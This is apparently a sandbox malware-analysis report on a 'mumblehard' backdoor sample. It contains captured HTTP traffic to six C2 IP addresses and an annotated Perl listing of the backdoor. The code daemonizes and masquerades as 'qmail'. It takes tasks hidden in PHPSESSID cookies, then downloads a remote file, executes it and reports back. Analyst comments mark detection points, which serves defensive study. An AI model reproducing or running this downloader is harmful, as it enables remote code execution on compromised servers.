MD5
0c7e1e0530046a4d976e2f1e94d00eb6
SHA256
a4199f2a1539f0e9b5d18b81873ad65f332046b2a1c4f7e44b039fd93e369c87
SHA1
df702f57838bd85c206480abb67e2831d467bf3c
File Name
File Type
C source, ASCII text
Analysis Date/Time
2016-12-15T14:28:09.478050
CPU Platform
X86
Comments
mumblehard backdoor
Tags

IPs Connected

Protocol | IP Address : Port
TCP5.2.86.225 : 80
TCP5.135.42.98 : 80
TCP5.101.142.81 : 80
TCP5.9.157.230 : 80
TCP50.7.133.245 : 80
TCP31.220.18.115 : 80

DNS Queries

Type | Query | Response

URLs Accessed

TCP Raw Streams

172.16.1.14:55517 --> 5.9.157.230:80

[172.16.1.14:55517 --> 5.9.157.230:80]

GET / HTTP/1.1
Host: 5.9.157.230
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.9
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close


[5.9.157.230:80 --> 172.16.1.14:55517]

HTTP/1.1 200 OK
Date: Thu, 15 Dec 2016 14:29:09 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Sat, 16 Jul 2016 23:12:45 GMT
ETag: "2b60-537c8df744f72-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3078
Connection: close
Content-Type: text/html

Zs6U$#,{'1LxRuw1H(Y=/QId5Mx&_]rwC&o"QU^OLxKC2U4pR7?`iL6zR-if92Al2|LD/:/2a1b|u1aM7]{4!R8'*FW\)|i.6&AOBmf#1^tKvCBcr=Vc.:yx3t{}sXYw~`_hP2OQ$Tcc~4b3&f*)
G4LvGGqQ|D2S1_	}Jwc#s	

	Z,6Icd2v*V67cBs#k_,kw#*fjL^Y3-wck?{u<K9;+r~w;i,nG/+SSdY>\{fR;9d`EDwpFQPX
@q-cypWld,d{m{d+OS?T^84';5;7!wf{Z~Nb
O=29R5GPIAPaWtt4\PdyQAkyIy]>nAas;Y#A.bC}mv?={~zRBBzMLDc/'fTLezPu,x0hAG]G#_\q$5lZui]
[5.9.157.230:80 --> 172.16.1.14:55517]

OO`YGmXT,}
!R
-CYjjrlDbrPW2c9e:	CjX!k]=B$Wj>}5nH}W66mG,=}
ywK8qSEX+^:=L~MBz9B.\^/UG`psa/F]^	;8LZwbm)>0WgUgfHvD$FlkHFBRisv	]Y16*P	0-h8i~?'(@(JA0h5tzWp@	jZ-1E"
g2j"6ER1h#6uM%y"dDM71*N=x9	S2cs4GCLIUt=x8PbTBr':1<rMQ5"mMv(94@6dR($K"$	6zH2MhX0Gtw{pc[>>.(Aa8[6v^>XvT&9!s%E,=Fn"Ck;:prlCljg"GknE80R
@tb
]2Hy.b%O[\P/%BXRO7c,~C{g}j<4,d[pbz[Lm\!c)JfBim/s]4bp1|jB8TW"$H"6Mga	
XA &4O!z'Z;df{@YoL*sOdGs B|,>nBmE56Kw$j5"cV),7n%xBKi$rj@! W#(.PS=o,*trv
A YTT1Y(fRtF7uAH\'>@FL
DxR+RBpT]mJgw1T*m-*,U4,cGK8%JCP0mE
`+W6YJ^11;
s
-_
[5.9.157.230:80 --> 172.16.1.14:55517]

&uJ6q]WM<BcA?t1
q5"+%X 3nQu V:]?F>p_s6`4Ky6k]]|YFxE@*X<d?XS:,]X,em
O8]
B3D
R-\ff2?b)x/ LqXUW[P	vT`(Lh&A
jIcFPr.4^k_*GP{N8rZ$>cJ#-k>EcG*AvMhb	Sl|s+/e<S.$IHl<Ha,jG:l4ux!{>|&xtaQZ=/UwXereT9re<AKh* bB3	':"N&V~nWSC=i)\)	W[VsWwFg/Lk/2o#~t)iSr\N#Z2/N<Src1c=Wlz&{`pQY={CsVbI;7TZr[@
t	
QX1)gD\@5DZktUIbk	!QS-8<4FMKnZS<(sC\GoSg$imWj7
}GU/+Vt=h,mX^OG`+

172.16.1.14:54185 --> 31.220.18.115:80

[172.16.1.14:54185 --> 31.220.18.115:80]

GET / HTTP/1.1
Host: 31.220.18.115
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.9
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close


[31.220.18.115:80 --> 172.16.1.14:54185]

HTTP/1.1 200 OK
Date: Thu, 15 Dec 2016 14:28:25 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Tue, 01 Nov 2016 14:21:13 GMT
ETag: "1-5403e096eb454"
Accept-Ranges: bytes
Content-Length: 1
Connection: close
Content-Type: text/html






                    
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
# Process-name masquerading: only argv[0] is rewritten, so the daemon appears
# as "qmail" in ps/top while the interpreter and script on disk are unchanged.
# Detection point: a "qmail" process whose executable is perl.
$0 = "qmail";
$| = 1;
# Per-OS errno values; http() compares $! against both after a non-blocking
# connect() (presumably EWOULDBLOCK/EAGAIN and EINPROGRESS — the names suggest
# it, the numeric values are hard-coded here rather than taken from POSIX).
my $ewblock = 11;
my $eiprogr = 150;
if ($^O eq "linux")   { $ewblock = 11; $eiprogr = 115; }
if ($^O eq "freebsd") { $ewblock = 35; $eiprogr = 36; }
# Legacy &sub() call syntax; the whole script runs inside main() and never
# returns (main() ends in exit 0).
&main();
# Entry point of the backdoor's one-shot check-in cycle: daemonize, poll the
# hard-coded C2 list for a task, and — only for command 16 — download a file,
# execute it, and report the outcome back to every C2.  Several closing
# braces / the array terminator are missing from this listing (extraction
# artefact); the code lines below are reproduced as captured.
sub main {
	# Classic double-fork-style daemonization: parent exits, child detaches
	# into its own session.
	exit 0 unless defined(my $pid = fork);
	exit 0 if $pid;
	POSIX::setsid();
	# Ignoring HUP/INT/TERM (and even SEGV) makes the process resistant to a
	# plain kill; SIGKILL is not in the list and cannot be ignored.
	$SIG{$_} = "IGNORE"
	  for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
	umask 0;
	chdir "/";
	# Two-arg open with bareword handles; all standard streams go to /dev/null.
	open(STDIN,  "</dev/null");
	open(STDOUT, ">/dev/null");
	open(STDERR, ">&STDOUT");
	# C2 address list — matches the "IPs Connected" section of this report.
	# The closing "];" is absent in the listing.
	my $url = [
		"31.220.18.115", "5.101.142.81", "5.2.86.225", "5.135.42.98",
		"50.7.133.245",  "5.9.157.230"
	# Random 6..10-letter probe filename used only to test whether /tmp is
	# writable; falls back to /var/tmp otherwise.  Detection point: creation
	# and immediate deletion of a random-named empty file in /tmp.
	my $tst = [ "a" .. "z", "A" .. "Z" ];
	$tst = join("", @$tst[ map { rand @$tst } (1 .. (6 + int rand 5)) ]);
	my $dir = "/var/tmp";
	if (open(F, ">", "/tmp/$tst")) {
		close F;
		unlink "/tmp/$tst";
		$dir = "/tmp";
	my ($header, $content);
	# Defaults, overwritten by a decoded task: download URL, local filename,
	# task id, command code (96 = no-op here, only 16 triggers execution),
	# and the http() timeout in seconds.
	my ($link, $file, $id, $command, $timeout) =
	  ("en.wikipedia.org", "index.html", 1, 96, 10);
	# Task retrieval: GET / from each C2 (mode 0 = Firefox-style request).
	# Response headers are written to "$dir/<epoch>", the body to
	# "$dir/<epoch>1"; both are removed afterwards.  The loop does not stop
	# at the first successful decode, so a later C2 can override an earlier one.
	foreach my $rs (@$url) {
		$header  = "$dir/" . time;
		$content = $header . "1";
		unlink $header  if -f $header;
		unlink $content if -f $content;
		&http($rs, $timeout, $header, $content, 0);
		if (open(F, "<", $header)) {
			flock F, 1;
			my ($test, $task) = (0, "");
			while (<F>) {
				# Trim leading/trailing whitespace from each header line.
				s/^\s*([^\s]?.*)$/$1/;
				s/^(.*[^\s])\s*$/$1/;
				next unless length $_;
				# A task is accepted only when BOTH exact lines are present.
				# NOTE(review): the captured responses earlier in this report
				# are "HTTP/1.1 200 OK", which this exact-string check would
				# not count — consistent with no task being issued in this run.
				$test++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close";
				# The task itself is smuggled in a Set-Cookie PHPSESSID value
				# (hex-encoded, see decd()).  Detection point: PHPSESSID
				# cookies from these hosts on a bare GET /.
				$task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
			}
			close F;
			($link, $file, $id, $command, $timeout) = &decd($task)
			  if $test == 2 && length $task;
		unlink $header  if -f $header;
		unlink $content if -f $content;
	# Only command 16 proceeds; any other value ends the cycle.
	exit 0 if !defined $command || $command !~ /^16$/;
	# Payload download (mode 1 = HTTP/1.0, MSIE-style request) into
	# "$dir/$file", where both $link and $file come from the decoded task.
	$header  = "$dir/" . time;
	$content = "$dir/$file";
	unlink $header  if -f $header;
	unlink $content if -f $content;
	&http($link, $timeout, $header, $content, 1);
	# Extract the 3-digit HTTP status from the status line; "000" = no reply.
	my ($resp, $size) = ("000", 0);
	if (open(F, "<", $header)) {
		flock F, 1;
		while (<F>) {
			s/^\s*([^\s]?.*)$/$1/;
			s/^(.*[^\s])\s*$/$1/;
			next unless length $_;
			$resp = $1 if /^HTTP\S+\s+(\d\d\d)/;
		close F;
	$size = (stat $content)[7] if -f $content;
	$size = 0 if !defined $size || $size !~ /^\d+$/;
	# Non-empty download: mark executable and run it through the shell
	# (string-form system), then delete it.  Detection point: a short-lived
	# 0755 file in /tmp or /var/tmp executed by a "qmail" perl process.
	if ($size > 0) {
		chmod 0755, $content;
		system "$content >/dev/null 2>&1";
	unlink $header  if -f $header;
	unlink $content if -f $content;
	# Result report to every C2.  The sixth http() argument replaces the
	# "Gecko/20100101" token of the User-Agent with "<id>.<status>.<size>"
	# (see the $gecko parameter in http()).  Detection point: a Firefox UA
	# whose Gecko/ build field is three dot-separated numbers.
	foreach my $rs (@$url) {
		$header  = "/dev/null";
		$content = $header;
		&http($rs, 10, $header, $content, 0, "$id.$resp.$size");
	exit 0;
# Rolling-key XOR used by decd() to decode task strings.  The key counts
# 1, 2, ... up to $lim - 1 and then restarts at 1 while $lim grows by 16 each
# cycle (16, 32, ..., 256); once $lim reaches 256 it wraps back to 16.
# The value $xor == $lim itself is never applied, because the reset happens
# before the byte is processed.  Symmetric: applying it twice restores input.
# Closing brace of the foreach/sub is absent in this listing.
sub xorl {
	my ($line, $code, $xor, $lim) = (shift, "", 1, 16);
	foreach my $chr (split(//, $line)) {
		if ($xor == $lim) { $lim = 0 if $lim == 256; $lim += 16; $xor = 1; }
		$code .= pack("C", unpack("C", $chr) ^ $xor);
		$xor++;
	return $code;
# Decodes the hex-encoded task carried in the PHPSESSID cookie.  Layout after
# hex decoding: five single bytes [len_link, len_file, id, command, timeout],
# followed by the XOR-obfuscated link and file strings of those two lengths.
# Returns (link, file, id, command, timeout) in the order main() assigns them.
# Closing brace of the sub is absent in this listing.
sub decd {
	my $data = pack("H*", shift);
	# The two shift calls below consume the length bytes; the three remaining
	# elements of @_ are returned unchanged as id, command and timeout.
	@_ = unpack("C5", substr($data, 0, 5, ""));
	return (&xorl(substr($data, 0, shift, "")),
		&xorl(substr($data, 0, shift, "")), @_);
sub http {
	my ($url, $timeout, $header, $content, $mode, $gecko) = @_;
	$gecko = "20100101" if !defined $gecko || !length $gecko;
	my ($host, $port, $path) = $url =~ /^([^\/:]+):*(\d*)?(\/?[^\#]*)/;
	return unless $host;
	my $addr;
	if (  $host =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/
		&& $1 < 256
		&& $2 < 256
		&& $3 < 256
		&& $4 < 256)
		$addr = pack("C4", $1, $2, $3, $4);
	else { $addr = gethostbyname $host; }
	return unless $addr;
	$port ||= 80;
	$path ||= "/";
	$addr = sockaddr_in($port, $addr);
	my $readers = IO::Select->new() or return;
	my $writers = IO::Select->new() or return;
	my $buffer  = join("\x0D\x0A",
		"GET $path HTTP/1.1",
		"Host: $host",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/$gecko Firefox/7.0.1",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.9",
		"Accept-Language: en-us,en;q=0.5",
		"Accept-Encoding: gzip, deflate",
		"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
		"Connection: close",
		"\x0D\x0A");
	if ($mode) {
		$buffer = join("\x0D\x0A",
			"GET $path HTTP/1.0",
			"Host: $host",
			"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
			"Accept: text/html,*/*",
			"Connection: close",
			"\x0D\x0A");
	my $socket = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
	return unless $socket;
	$socket->blocking(0);
	unless ($socket->connect($addr)) {
		if ($! != $eiprogr && $! != $ewblock) {
			close $socket;
			return;
	$writers->add($socket);
	$timeout += time;
	my $step = 0;
	while (1) {
		IO::Select->select(undef, undef, undef, 0.02);
		my $writable = (IO::Select->select(undef, $writers, undef, 0))[1];
		foreach my $handle (@$writable) {
			if ($step == 0) { $step = 1 if $handle->connected; }
			if ($step == 1) {
				my $result = syswrite($handle, $buffer);
				if (defined $result && $result > 0) {
					substr($buffer, 0, $result) = "";
					if (!length $buffer) {
						$readers->add($handle);
						$writers->remove($handle);
						$step = 2;
					}
				}
				elsif ($! == $ewblock) { next; }
				else                     { $timeout = 0; }
			}
		my $readable = (IO::Select->select($readers, undef, undef, 0))[0];
		foreach my $handle (@$readable) {
			next if $step < 2;
			my $result;
			if ($step == 2) {
				$result = sysread($handle, $buffer, 8192, length $buffer);
			}
			else { $result = sysread($handle, $buffer, 8192); }
			if (16384 < length $buffer) { $timeout = 0; }
			elsif (defined $result) {
				if ($result > 0) {
					if ($step == 2) {
						my $offset = index($buffer, "\x0D\x0A\x0D\x0A");
						next if $offset < 0;
						if (open(F, ">>", $header)) {
							flock F, 2;
							binmode F;
							print F substr($buffer, 0, $offset);
							close F;
						}
						substr($buffer, 0, $offset + 4) = "";
						$step = 3;
					}
					if ($step == 3) {
						if (length $buffer) {
							if (open(F, ">>", $content)) {
								flock F, 2;
								binmode F;
								print F $buffer;
								close F;
							}
							$buffer = "";
						}
					}
					next;
				}
				$timeout = 0;
			}
			elsif ($! == $ewblock) { next; }
			else                     { $timeout = 0; }
		if ($timeout < time) {
			foreach my $handle ($writers->handles, $readers->handles) {
				$writers->remove($handle) if $writers->exists($handle);
				$readers->remove($handle) if $readers->exists($handle);
				close $handle;
			}
			return;